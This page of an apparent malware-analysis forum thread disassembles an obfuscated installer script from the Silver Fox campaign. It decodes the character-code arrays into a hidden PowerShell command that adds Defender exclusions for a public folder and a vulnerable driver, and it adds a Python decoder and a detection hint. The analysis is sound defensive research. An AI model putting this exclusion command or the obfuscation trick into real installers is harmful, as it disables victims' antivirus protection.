Subject: The ever-evolving Silver Fox (银狐): adding more and more vulnerable drivers to terminate antivirus software via BYOVD
Replies: 7

PascalScript (IFPS) disassembly, continued from the previous page. The listing is the tail of the function that assembles the command line and runs it; the ";" notes after the character-code lines and after the EXEC/SLEEP calls are annotations added by the editor, not part of the disassembler output.

pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(39) ; '
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(44) ; ,
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
assign Var4, Var5
pop ; StackCount = 4
pushtype WideString ; StackCount = 5
assign Var5, Var4
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(32) ; space
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
assign Var4, Var5
pop ; StackCount = 4
pushtype WideString ; StackCount = 5
assign Var5, Var4
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(39) ; '
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(13)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(67)
assign Var8[1], S32(58)
assign Var8[2], S32(92)
assign Var8[3], S32(67)
assign Var8[4], S32(110)
assign Var8[5], S32(100)
assign Var8[6], S32(111)
assign Var8[7], S32(109)
assign Var8[8], S32(54)
assign Var8[9], S32(46)
assign Var8[10], S32(115)
assign Var8[11], S32(121)
assign Var8[12], S32(115) ; the 13 codes decode to C:\Cndom6.sys
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(39) ; '
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype Type30 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype S32 ; StackCount = 9
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
pop ; StackCount = 9
pop ; StackCount = 8
assign Var8[0], S32(34) ; "
assign Var7, Var8
pop ; StackCount = 7
pushvar Var6 ; StackCount = 8
call STRFROMCODE
pop ; StackCount = 7
pop ; StackCount = 6
add Var5, Var6
pop ; StackCount = 5
assign Var4, Var5
pop ; StackCount = 4
pushtype BOOLEAN ; StackCount = 5
pushtype Pointer ; StackCount = 6
setptr Var6, Var1
pushtype U8_4 ; StackCount = 7
assign Var7, U8_4(1)
pushtype S32 ; StackCount = 8
assign Var8, S32(0)
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, String_3("")
pushtype UnicodeString_2 ; StackCount = 10
pushtype WideString ; StackCount = 11
assign Var11, Var3
pushtype UnicodeString_2 ; StackCount = 12
pushtype Type30 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype S32 ; StackCount = 15
assign Var15, S32(1)
pushvar Var14 ; StackCount = 16
call SETARRAYLENGTH
pop ; StackCount = 15
pop ; StackCount = 14
assign Var14[0], S32(32) ; space
assign Var13, Var14
pop ; StackCount = 13
pushvar Var12 ; StackCount = 14
call STRFROMCODE
pop ; StackCount = 13
pop ; StackCount = 12
add Var11, Var12
pop ; StackCount = 11
add Var11, Var4
assign Var10, Var11 ; Var10 = Var3 + ' ' + Var4
pop ; StackCount = 10
pushtype UnicodeString_2 ; StackCount = 11
assign Var11, Var2
pushvar Var5 ; StackCount = 12
call EXEC ; arguments were pushed right to left: Exec(Var2, Var10, '', 0 = SW_HIDE, 1 = ewWaitUntilTerminated, Var1), result in Var5
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
pop ; StackCount = 6
pop ; StackCount = 5
pop ; StackCount = 4
pushtype S32 ; StackCount = 5
assign Var5, S32(4000)
call SLEEP ; Sleep(4000)
pop ; StackCount = 4
loc_ead:
ret

Below are the decoded results for all of the ASCII-code arrays:

Array 1 (14 bytes)
ASCII codes: 112, 111, 119, 101, 114, 115, 104, 101, 108, 108, 46, 101, 120, 101
String: "powershell.exe"

Array 2 (8 bytes)
ASCII codes: 45, 67, 111, 109, 109, 97, 110, 100
String: "-Command"

Array 3 (1 byte)
ASCII codes: 34
String: " (a single double-quote character)

Array 4 (16 bytes)
ASCII codes: 65, 100, 100, 45, 77, 112, 80, 114, 101, 102, 101, 114, 101, 110, 99, 101
String: "Add-MpPreference"

Array 5 (1 byte)
ASCII codes: 32
String: " " (space)

Array 6 (14 bytes)
ASCII codes: 45, 69, 120, 99, 108, 117, 115, 105, 111, 110, 80, 97, 116, 104
String: "-ExclusionPath"

Array 7 (1 byte)
ASCII codes: 32
String: " " (space)

Array 8 (1 byte)
ASCII codes: 39
String: "'"

Array 9 (25 bytes)
ASCII codes: 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115
String: "C:\Users\Public\Documents"

Array 10 (1 byte)
ASCII codes: 39
String: "'"

Array 11 (1 byte)
ASCII codes: 44
String: ","

Array 12 (1 byte)
ASCII codes: 32
String: " " (space)
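The manual decoding above can be automated. The following is an added example written for this page, not code from the original post or from the analysed sample: it parses the SETARRAYLENGTH / assign VarN[i], S32(code) / STRFROMCODE pattern of the listing, emits each string in program order, and joins them the way the script's "add" instructions do. The embedded input is an excerpt of the disassembly quoted on this page (the stack bookkeeping lines are trimmed, which does not change the result); the function names and the regular expression are the editor's own. It also decodes the "ASCII codes:" lists from the summary, which recovers the backslashes (code 92) that the summary lost in extraction.

```python
import re
from typing import List

# Constructed input: an excerpt of the disassembly quoted on this page, trimmed
# to the instructions the decoder needs.  The pushtype/pop stack bookkeeping
# between them does not affect the result and is left out; one "pushvar" line
# keeps its "; StackCount" comment to show that such comments are tolerated.
DISASM_EXCERPT = """\
assign Var9, S32(1)
pushvar Var8 ; StackCount = 10
call SETARRAYLENGTH
assign Var8[0], S32(39)
assign Var7, Var8
call STRFROMCODE
add Var5, Var6
assign Var9, S32(13)
call SETARRAYLENGTH
assign Var8[0], S32(67)
assign Var8[1], S32(58)
assign Var8[2], S32(92)
assign Var8[3], S32(67)
assign Var8[4], S32(110)
assign Var8[5], S32(100)
assign Var8[6], S32(111)
assign Var8[7], S32(109)
assign Var8[8], S32(54)
assign Var8[9], S32(46)
assign Var8[10], S32(115)
assign Var8[11], S32(121)
assign Var8[12], S32(115)
assign Var7, Var8
call STRFROMCODE
add Var5, Var6
assign Var9, S32(1)
call SETARRAYLENGTH
assign Var8[0], S32(39)
assign Var7, Var8
call STRFROMCODE
add Var5, Var6
assign Var9, S32(1)
call SETARRAYLENGTH
assign Var8[0], S32(34)
assign Var7, Var8
call STRFROMCODE
add Var5, Var6
assign Var4, Var5
"""

# One element write into the character-code array, e.g. "assign Var8[3], S32(67)".
ARRAY_ELEM = re.compile(r"^assign Var\d+\[(\d+)\], S32\((-?\d+)\)$")


def decode_strfromcode(disasm: str) -> List[str]:
    """Return the string produced by each STRFROMCODE call, in program order.

    The listing sizes an integer array with SETARRAYLENGTH, fills it with one
    "assign VarN[i], S32(code)" per character, and STRFROMCODE turns it into a
    string that "add" then appends to an accumulator.  Element writes since the
    previous STRFROMCODE are therefore the argument of the next one.
    """
    codes = {}  # index -> character code of the array currently being filled
    pieces: List[str] = []
    for raw in disasm.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop "; StackCount = n"
        m = ARRAY_ELEM.match(line)
        if m:
            codes[int(m.group(1))] = int(m.group(2))
        elif line == "call STRFROMCODE":
            if not codes:
                raise ValueError("STRFROMCODE reached with no character codes buffered")
            pieces.append("".join(chr(codes[i]) for i in sorted(codes)))
            codes = {}
        elif line == "call SETARRAYLENGTH" and codes:
            # A new array is sized before the previous one was consumed, which
            # the pattern above never does: refuse rather than merge two strings.
            raise ValueError("SETARRAYLENGTH while character codes are still buffered")
    return pieces


def decode_ascii_list(text: str) -> str:
    """Decode a "67, 58, 92, ..." list like those in the summary on this page.

    Code 92 is a backslash; decoding the codes recovers path separators that
    the summary lost in extraction.
    """
    return "".join(chr(int(tok)) for tok in text.split(",") if tok.strip())


def reconstruct_visible_tail(disasm: str) -> str:
    """Join the pieces the way the script does with "add Var5, Var6".

    Only the part of the function on this page is visible, so the result is
    the tail of Var4, not the whole argument string passed to Exec.
    """
    return "".join(decode_strfromcode(disasm))


if __name__ == "__main__":
    for piece in decode_strfromcode(DISASM_EXCERPT):
        print(repr(piece))
    print(reconstruct_visible_tail(DISASM_EXCERPT))
```

Run on the excerpt, the visible tail of Var4 comes out as 'C:\Cndom6.sys'" : the driver path is the last entry of the exclusion list and the final double quote closes the string that follows -Command. Because the call is Exec(Var2, Var3 + ' ' + Var4, '', SW_HIDE, ewWaitUntilTerminated, ResultCode), the whole thing runs as a hidden, synchronous powershell.exe child of the installer, and Defender records the resulting exclusion change as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, which is the place to hunt for it.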
(page 6/17)